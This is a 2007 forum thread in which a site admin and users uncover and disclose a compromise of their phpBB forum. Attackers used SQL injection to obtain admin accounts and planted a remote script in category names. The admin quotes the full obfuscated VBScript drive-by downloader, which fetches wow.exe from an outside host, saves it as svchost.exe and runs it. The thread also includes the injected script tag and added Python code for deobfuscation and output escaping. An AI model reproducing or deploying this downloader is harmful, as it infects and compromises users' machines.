WarcraftRealms.com
Forum "jump to" menu problem

 
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914

Posted: Thu Aug 16, 2007 6:59 am    Post subject: Forum "jump to" menu problem

On forum pages that have a drop-down "Jump to" menu at the bottom, I'm getting a weird error that's causing the page to render with a width about ten times my screen size! The problem seems to be an item in the drop-down menu where some javascript is appearing verbatim. I've taken a screenshot in the hopes you can track it down.


My browser is Safari 2.0.4 on Mac OS X 10.4.10
_________________

and the rest
DM.
Census Tester


Joined: 03 Oct 2005
Posts: 1155
Location: Toronto, Canada
WR Updates: 841,833

Posted: Thu Aug 16, 2007 10:46 am

You mean there's more browsers than just Firefox? Shocked
_________________

Click my sig
Skyfire
Trolling Enforcement


Joined: 18 Aug 2005
Posts: 746
Location: New Jersey
WR Updates: 44,279

Posted: Thu Aug 16, 2007 12:30 pm

So long as (s)he's using anything other than IE, it's good with me.
_________________
Admin on WoWWiki
Moderator, Blogger on Wowhead
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914

Posted: Thu Aug 16, 2007 12:38 pm

DM. wrote:
You mean there's more browsers than just Firefox? Shocked


It's okay - I'm using Firefox at work! I haven't used IE in months (years?), unless I need to for testing purposes, and then I have to borrow someone else's computer to do so. When Microsoft decided to stop offering IE for Mac, no-one was happier than me Smile
_________________

and the rest
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914

Posted: Thu Aug 16, 2007 5:41 pm

Additional information:

Here's the source of the problematic option tag (replace {} with <>)
{option value="-1"}General{script src=http://www.exponentialsl.com/tags/css.js}{/script}{/option}
The homepage of that domain looks a little dodgy - any idea why the script is in there, Rollie?
_________________

and the rest
Tartara



Joined: 20 Dec 2005
Posts: 90
Location: Tucson, AZ
WR Updates: 844,914

Posted: Thu Aug 16, 2007 6:09 pm

Hm, not liking what I see here. Looking at that script sitting quietly in the Jump to: menu (which I'd never have noticed if Safari hadn't helpfully displayed it to me) I see a few disturbing things including a mention of svchost.exe which - according to http://www.liutilities.com/products/wintaskspro/processlibrary/svchost/ - is a BAD BAD THING. Any javascript wizzes around here want to look at it?

A quick google turns up just one other site referencing exponentialsl.com - and that's in some title tags on wowstatus.net, a site dedicated to spreading information on WoW private servers. Razz

The script shows up in the source of these forums in Firefox too, though without the visible code in the menu, which makes me think perhaps it's actually running. Lucky I'm on a Mac! Any of you reading these forums with Windows, you might want to hold off for a bit. And run your virus/trojan scanners.

Rollie, I hope you haven't been hacked! Shocked
_________________

and the rest
Skyfire
Trolling Enforcement


Joined: 18 Aug 2005
Posts: 746
Location: New Jersey
WR Updates: 44,279

Posted: Thu Aug 16, 2007 11:53 pm

Google (http://www.google.com/search?hl=en&q=svchost.exe&btnG=Google+Search) says svchost is fine. The ones that are issues are those that are made to look like svchost, like svch0st, or scvhost, etc.
_________________
Admin on WoWWiki
Moderator, Blogger on Wowhead
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131

Posted: Fri Aug 17, 2007 1:06 pm

OK, I'm out of town and on my laptop, digging into it as best I can for now. If nothing else, I may shut the forums down until I return.

Course if I do, you won't likely be able to read this =)
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131

Posted: Fri Aug 17, 2007 1:16 pm

Well, I was able to remove the offending entry. Unfortunately it means I have been compromised to some degree here. It could be as minor as the admin account having been hacked, to as major as my actual server being hacked. Unfortunately there is no way to know when this happened.

I'm still researching what it was doing exactly as I'm sure it was no good...
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131

Posted: Fri Aug 17, 2007 1:51 pm

This is what it looks like it was trying to run. From what little research I've done, it appears that it is trying to download a file, wow.exe, from the exponentialsl.com site. My best guess is that this is a trojan, keylogger. I would strongly recommend all users update their virus scanners and do a fresh check.

Quote:

<script>
on error resume next
t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
m11="o"
m12="bj"
m13="ect"
m1=m11&m12&m13
m21="cl"
m22="ass"
m23="id"
m2= m21&m22&m23
m31="clsid:"
m32="BD96C556"
m33="-65A3-"
m34="11D0-983A"
m35="-00C04F"
m36="C29E36"
m3=m31&m32&m33&m34&m35&m36

m41="Microsoft"
m42=".XML"
m43="HTTP"
m4=m41&m42&m43

m51="Shel"
m52="l.App"
m53="lication"
m5=m51&m52&m53

m61="Scrip"
m62="ting.Fi"
m63="leSyst"
m64="emObject"
m6=m61&m62&m63&m64

sub tcsafe2exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub

Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3

Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe2exe(m5,X9)
</script>


At this point I'm not sure how the intruder got in or how serious the invasion is. I am embarrassed and saddened by this news.

As far as I can tell only IE users or other browsers with installed ActiveX components were at risk. I will do more research as I can and will relay information as it becomes available.

I'm sorry =(
Back to top
View user's profile Send private message Visit poster's website
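
The string-splitting in the quoted script can be undone without running it. The following is an added example, not part of the original post: Python that folds the `&` concatenations from a subset of the quoted assignment lines and reports the assembled URL and any ProgID on a watch list. The `RISKY` list and the reading of `\/` as `/` are assumptions of this example.

```python
import re

# Assignment lines copied from the script quoted above (a subset); data only.
SAMPLE = r'''
t1= "http:\/\/"
t2= "www."
t3= "expone"
t4= "ntialsl"
t5= ".com"
t6= "\/wow"
t7= ".exe"
tcsafe = t1&t2&t3&t4&t5&t6&t7
m41="Microsoft"
m42=".XML"
m43="HTTP"
m4=m41&m42&m43
'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
TERM = re.compile(r'\s*(?:"([^"]*)"|([A-Za-z_]\w*))\s*(?:&|$)')
# ProgIDs that let page script fetch, write or launch files (assumed watch list).
RISKY = {"microsoft.xmlhttp", "adodb.stream", "shell.application"}

def fold(expr, env):
    # Concatenate literals and already-known names; None if anything else appears.
    out, pos = [], 0
    while pos < len(expr):
        m = TERM.match(expr, pos)
        lit, var = m.group(1, 2) if m else (None, None)
        val = lit if lit is not None else env.get((var or "").lower())
        if val is None:
            return None
        out.append(val)
        pos = m.end()
    return "".join(out)

def resolve(script):
    env = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        value = fold(m.group(2), env) if m else None
        if value is not None:
            env[m.group(1).lower()] = value
    return env

def indicators(env):
    # "\/" is read as "/" (this example's assumption about the intended URL).
    values = {v.replace("\\/", "/") for v in env.values()}
    urls = sorted(v for v in values if re.match(r'https?://\w', v, re.I))
    return urls, sorted(v for v in values if v.lower() in RISKY)
```

Lines that are not pure string concatenation, such as the `createobject` calls, fold to nothing and are skipped, so the resolver never evaluates script behaviour.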
WyriHaximus



Joined: 18 Oct 2005
Posts: 244
Location: Koedijk, Alkmaar, Noord-Holland, The Netherlands
WR Updates: 1,520,754

Posted: Fri Aug 17, 2007 3:27 pm

Wow, that is a nasty little bugger :O! I hope you updated your software properly, like a good developer should know, Rollie Razz.
_________________

My World of Warcraft Screenshots / Map
Balgair
Araiceil


Joined: 30 Sep 2005
Posts: 1483
Location: UK
WR Updates: 10,829,931

Posted: Fri Aug 17, 2007 6:12 pm

Eep, not good Confused Only wow.exe files on my computer are the real thing, but updating and running virus/antispyware scans anyway to be on the safe side - I'm pretty sure I have my IE locked down to be safe from keyloggers etc but still gonna double-check to be sure!
_________________
EU-Draenor:
-- Sagart - Tairbh - Buinne - Balgair - Eilnich - Ruire - Dubh - Laidir - Naomh --
Rollie
Site Admin


Joined: 28 Nov 2004
Posts: 5374
Location: Austin, TX
WR Updates: 480,131

Posted: Sun Aug 19, 2007 6:56 pm

So I think I've tracked down some more details. It appears that the individual(s) responsible basically used an SQL injection attack to give themselves admin accounts on WCR. Using these admin accounts, they were able to put the scripts into the Category names.

I now face the daunting task of trying to figure out where they were able to successfully launch the SQL injection attack and snuff it out.

I believe this incident occurred around 8/14 midnight as that is when the account that gave access was created. I have disabled/banned the accounts and removed the admin rights. I'll also be modifying the phpBB code to disallow that type of thing from occurring again in the future.
Back to top
View user's profile Send private message Visit poster's website
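
The post above describes script stored in category names and then written into the "Jump to" menu as-is. As an added example (not phpBB code and not from the post), the Python below audits stored names for markup and renders the menu with output escaping. The rows and the `example.invalid` URL are constructed.

```python
import html
from html.parser import HTMLParser

# Constructed rows: (forum id, category name as stored). The second mirrors the
# injected option reported in this thread, with a placeholder script URL.
ROWS = [
    (1, "WarcraftRealms.com Bugs"),
    (-1, "General<script src=http://example.invalid/x.js></script>"),
    (3, "Tips & Tricks"),
]

class TagFinder(HTMLParser):
    """Records every start tag the HTML parser sees in a string."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(text):
    finder = TagFinder()
    finder.feed(text)
    finder.close()
    return finder.tags

def audit(rows):
    # A category name is plain text, so any tag parsed from one is a finding.
    return [(fid, tags_in(name)) for fid, name in rows if tags_in(name)]

def render_jump_menu(rows):
    # Escape on output: a stored name can then never open a tag in the page.
    options = "".join(
        '<option value="%d">%s</option>' % (fid, html.escape(name))
        for fid, name in rows)
    return '<select name="f">%s</select>' % options
```

Running `tags_in` over the rendered menu is a quick regression check: only `select` and `option` should appear, whatever the stored names contain.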
heartless_



Joined: 09 Jan 2005
Posts: 134

WR Updates: 182,172

Posted: Mon Aug 20, 2007 8:22 pm

Sorry to hear about it man, but at least you were honest about it and have a clue as to how to fix it. I've seen things like this happen on guild-run forums and it is disastrous.
_________________


All times are GMT - 6 Hours
Powered by phpBB © 2001, 2005 phpBB Group